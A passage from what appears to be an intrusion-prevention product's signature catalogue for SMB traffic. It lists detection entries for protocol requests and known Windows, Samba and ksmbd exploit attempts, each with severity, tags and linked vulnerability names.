About this situation: An attempt to exploit a buffer overflow vulnerability in the Snort DCE/RPC preprocessor.
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Snort, CVE2006, Windows not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow
Description:
Back to top

SMB-TCP_Blackmatter-Ransomware-Remote-Encryption-Attempt

About this situation: BlackMatter ransomware remote encryption attempt was detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Blackmatter-Ransomware-Remote-Encryption-Attempt
Description:
Back to top

SMB-TCP_Breakingpoint-Generated-Negotiate-Protocol-Request-Message

About this situation: An identified Negotiate Protocol Request message detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1059-5242
Description:
Back to top

SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007

About this situation: Detected exploit on MS04-007 bug
Context: SMB Client Header Stream
Severity: 10
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, Any Hardware, MS2004, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description:
Back to top

SMB-TCP_CHS-Asn-1-Integer-BOF-MS04-007-2

About this situation: Detected exploit on MS04-007 bug
Context: SMB Client Header Stream
Severity: 10
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, Any Hardware, MS2004, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description:
Back to top

SMB-TCP_CHS-Authentication-Attempt

About this situation: An attempt to authenticate using Samba was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2008-11, CVE2008, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-184-2032
Last changed: sgpkg-ips-461-5211
Vulnerability: Microsoft-Windows-SMB-Authentication-Reflection-Remote-Code-Execution
Description:
Back to top

SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acad.FAS

About this situation: A request to acad.fas detected
Context: SMB Client Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, CVE2014, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-574-5211
Vulnerability: Autodesk-Autocad-Insecure-FAS-Loading
Description:
Back to top

SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acdimres.dll

About this situation: A request to acdimres.dll detected
Context: SMB Client Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, CVE2014, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-574-5211
Vulnerability: Autodesk-Autocad-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS-Autodesk-Autocad-Request-To-DWG-File

About this situation: A request to a DWG file detected
Context: SMB Client Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Autodesk AutoCAD, CVE2014, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-574-5211
Vulnerability: Autodesk-Autocad-Insecure-FAS-Loading
Description:
Back to top

SMB-TCP_CHS-CA-BrightStor-Discovery-Service-CheyenneDS-Mailslot-Traffic-Detected

About this situation: First-class Mailslot message to CA BrightStor detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, x86, Computer Associates BrightStor, CVE2006, Windows not specific, Computer Associates BrightStor not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SMB_CA-BrightStor-Discovery-Service-Mailslot-Buffer-Overflow-Vulnerability
Description:
Back to top

SMB-TCP_CHS-Check-Directory-Request

About this situation: Samba Check Directory request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Close-Print-File-Request

About this situation: Samba Close Print File request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Close-Request

About this situation: Samba Close request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Copy-Request

About this situation: Samba Copy request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Create-Directory-Request

About this situation: Samba Create Directory request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Create-New-Request

About this situation: Samba Create New request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Create-Request

About this situation: Samba Create request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Create-Temporary-Request

About this situation: Samba Crate Temporary request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Delete-Directory-Request

About this situation: Samba Delete Directory request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Delete-Request

About this situation: Samba Delete request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Echo-Request

About this situation: SMB echo request detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Samba, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Find-Close-Request

About this situation: Samba Find request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Find-Close2-Request

About this situation: Samba Find Close2 request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Find-Notify-Close-Request

About this situation: Samba Find Notify Close request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Find-Request

About this situation: Samba Find request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Find-Unique-Request

About this situation: Samba Find request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-First-Class-Mailslot-Traffic-Detected

About this situation: First-class Mailslot message detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, x86, MS2006-07, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Mailslot-Heap-Overflow
Description:
Back to top

SMB-TCP_CHS-Flush-Request

About this situation: Samba Flush request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Get-Print-Queue-Request

About this situation: Samba Get Print Queue request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Invalid-Command-Request

About this situation: Samba Invalid Command request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-IOCTL-Request

About this situation: Samba IOCTL request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-IOCTL-Secondary-Request

About this situation: Samba IOCTL request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2023, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1739-5242
Last changed: sgpkg-ips-1739-5242
Vulnerability: Linux-Kernel-Ksmbd-Compounded-Treeid-Validation-Information-Disclosure
Description:
Back to top

SMB-TCP_CHS-Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ksmbd, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Vulnerability: Linux-Kernel-Ksmbd-Session-Key-Exchange-Heap-Buffer-Overflow
Description:
Back to top

SMB-TCP_CHS-Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Linux-Kernel-Ksmbd-Setinfo-Request-Out-of-Bounds-Read-Information-Disclosure
Description:
Back to top

SMB-TCP_CHS-Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2023, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: Linux-Kernel-Ksmbd-SMB2-Logoff-Handling-Null-Pointer-Dereference
Description:
Back to top

SMB-TCP_CHS-Lock-And-Read-Request

About this situation: Samba Lock And Read request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Lock-Byte-Range-Request

About this situation: Samba Lock Byte Range request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Locking-AndX-Request

About this situation: Samba Locking AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Logoff-AndX-Request

About this situation: Samba Logoff AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Malware-Filename-Access

About this situation: File that has a filename commonly used for malware has been accessed
Context: SMB Client Header Stream
Severity: 7
Tags: Windows XP, Windows NT, Windows 2000, Windows 2003, Windows Vista, x86, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-571-5211
Vulnerability: Windows-Malware-Filename
Description:
Back to top

SMB-TCP_CHS-Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849

About this situation: Detected an attempt to exploit a vulnerability in Microsoft Lync
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Lync, MS2012-06, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-459-5211
Last changed: sgpkg-ips-459-5211
Vulnerability: Microsoft-Lync-Insecure-Library-Loading-CVE-2012-1849
Description:
Back to top

SMB-TCP_CHS-Microsoft-Office-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2011-09, CVE2011, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-421-4219
Vulnerability: Microsoft-Office-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS-Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396

About this situation: Detected attempt to exploit a vulnerability in Microsoft PowerPoint
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft PowerPoint, MS2011-12, CVE2011, Windows not specific, Microsoft PowerPoint not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-428-4219
Vulnerability: Microsoft-PowerPoint-Insecure-Library-Loading-CVE-2011-3396
Description:
Back to top

SMB-TCP_CHS-Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2010-0029

About this situation: Detected attempt to exploit a vulnerability in Microsoft Remote Desktop
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Remote Desktop Client, MS2011-03, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Microsoft-Remote-Desktop-Insecure-Library-Loading-CVE-2011-0029
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Color-Control-Panel-Library-Loading-CVE-2010-5082

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: SMB Client Header Stream
Severity: 7
Tags: Windows 2008, Any Hardware, MS2012-02, CVE2010, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Microsoft-Windows-Color-Control-Panel-Insecure-Library-Loading-CVE-2010-5082
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: SMB Client Header Stream
Severity: 7
Tags: Windows Vista, Windows 7, Windows 2008 R2, Any Hardware, MS2011-03, CVE2011, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-File-Handling-Component-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-04, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-576-5211
Last changed: sgpkg-ips-1188-5242
Vulnerability: Microsoft-Windows-File-Handling-Component-Remote-Code-Execution
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Media-Center-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-10, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-Windows-Media-Center-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Negoex-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2022, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1549-5242
Last changed: sgpkg-ips-1549-5242
Vulnerability: Microsoft-Windows-SMB-Negoex-Buffer-Overflow
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Vulnerability: Microsoft-Windows-NTLM-Message-Integrity-Check-Tampering
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution

About this situation: Detects remote code execution exploits against Microsoft Windows via a crafted SMB Rename request
Context: SMB Client Header Stream
Severity: 7
Tags: Windows 2000 SP4, Windows 2003 SP1, Windows XP SP1, Windows XP SP2, x86, MS2006-10, CVE2006, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Server-Service-SMB-Rename-Code-Execution
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Remote-Code-Execution-MS10-012

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Windows SMB server detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-283-4219
Last changed: sgpkg-ips-283-4219
Vulnerability: Microsoft-Windows-SMB-Server-Remote-Code-Execution-CVE-2010-0020
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 10
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-920-5242
Last changed: sgpkg-ips-920-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-927-5242
Last changed: sgpkg-ips-927-5242
Vulnerability: Microsoft-Windows-SMB-Server-Smbv1-Out-Of-Bounds-Read
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-901-5242
Last changed: sgpkg-ips-901-5242
Vulnerability: Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Themes-Race-Condition

About this situation: An attempt to exploit a vulnerability in Microsoft Windows themes detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, x86, MS2023-09, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Portable-Executable-msstyles-File-Transfer
Microsoft-Windows-Themes-Reviseversionifnecessary-Race-Condition
Description:
Back to top

SMB-TCP_CHS-Microsoft-Windows-Write-AndX-SMB-Processing-DOS

About this situation: Denial of service exploit against Microsoft Windows detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-01, CVE2008, Windows not specific, Denial of Service, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-172-2032
Vulnerability: Microsoft-Windows-Write-AndX-SMB-Processing-DOS
Description:
Back to top

SMB-TCP_CHS-Move-Request

About this situation: Samba Move request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Negotiate-Protocol-Request

About this situation: SMB negotiate protocol request detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Samba, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-284-4219
Last changed: sgpkg-ips-740-5211
Description:
Back to top

SMB-TCP_CHS-Nessus-Vulnerability-Scanner-Usage

About this situation: Detects SMB requests used by the Nessus vulnerability scanner.
Context: SMB Client Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Nessus, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-159-2032
Last changed: sgpkg-ips-159-2032
Vulnerability: Nessus-Vulnerability-Scanner-Usage
Description:
Back to top

SMB-TCP_CHS-No-AndX-Command-Request

About this situation: Samba No AndX Command request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Nonstandard-Command-Request

About this situation: Unknown Samba request was detected
Context: SMB Client Header Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Nonzero-Reserved-Value-In-AndX-Header

About this situation: An unusual value was found in an SMB message
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-427-4219
Vulnerability: SMB-Nonzero-Reserved-Value-In-AndX-Header
Description:
Back to top

SMB-TCP_CHS-Nozero-Error-Field-In-Request

About this situation: Samba request with nonzero error field was detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-579-5211
Description:
Back to top

SMB-TCP_CHS-NT-Cancel-Request

About this situation: Samba NT Cancel request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-NT-Create-AndX-Request

About this situation: Samba NT Transact request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-NT-Rename-Request

About this situation: Samba NT Rename request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-NT-Transact-Request

About this situation: Samba NT Transact request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-NT-Transact-Secondary-Request

About this situation: Samba NT Transact request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-NTLM-Authentication-Usage

About this situation: Detects NTLM authentication usage
Context: SMB Client Header Stream
Severity: 1
Tags: Windows, Any Hardware, MS2009-04, CVE2009, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-217-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: HTTP_Microsoft-HTTP-Services-Authentication-Reflection
Description:
Back to top

SMB-TCP_CHS-Null-Session-Samr-Access

About this situation: SAM registry access using Null session detected
Context: SMB Client Header Stream
Severity: 2
Tags: Windows XP, Windows NT, Windows 2000, Windows 2003, Windows Vista, x86, Windows XP not specific, Windows NT not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-870-5242
